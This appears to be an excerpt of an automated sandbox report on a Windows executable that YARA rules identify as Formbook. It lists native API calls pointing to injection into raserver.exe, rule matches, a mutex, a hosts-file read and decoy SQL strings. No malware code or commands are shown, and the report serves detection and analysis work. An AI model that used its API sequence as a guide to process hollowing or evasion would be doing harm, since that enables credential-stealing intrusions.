          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019999D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A10 NtQuerySection,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019995F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999560 NtWriteFile,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199A770 NtOpenThread,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999760 NtOpenProcess,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019996D0 NtCreateKey,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E80 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E00 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9DA9 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E7A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F2D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5FB20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5C2B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B594B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5F73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4E58
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8E6A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4EBD68
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E6578
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4EA52C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4588
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8890
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E88A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8E5E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8EEC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8C8C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8C98
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D069
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA97
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D5C9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402D8D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409E2B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409E30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DF79
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195F900
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B090
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A220A8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A228EC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2E824
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A11002
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198EBB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198ABD8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1DBD2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A103DA
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22B28
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AB40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A222AE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FA2B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A225DD
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22D07
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01950D20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21D55
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196841F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1D466
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21FF1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2DFCE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22EF7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01976E30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCD466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B00D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B26E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCD616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BDDFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B320A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2A830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BDE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B299BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B24120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4AEF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB23E3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC03DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3ABD8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCDBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2A309
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AAD069
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AADA97
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92D8D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A99E2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A99E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AADF79
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: String function: 0195B150 appears 87 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04B0B150 appears 133 times
          Source: XhU4EXUp0x.exe, 00000000.00000002.657834635.0000000005920000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000000.00000000.643332701.0000000000420000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.707120497.0000000000F40000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.707570278.0000000001689000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.708280098.0000000001BDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exeBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: XhU4EXUp0x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.logJump to behavior
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeMutant created: \Sessions\1\BaseNamedObjects\zheXInonhS
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_01
          Source: XhU4EXUp0x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
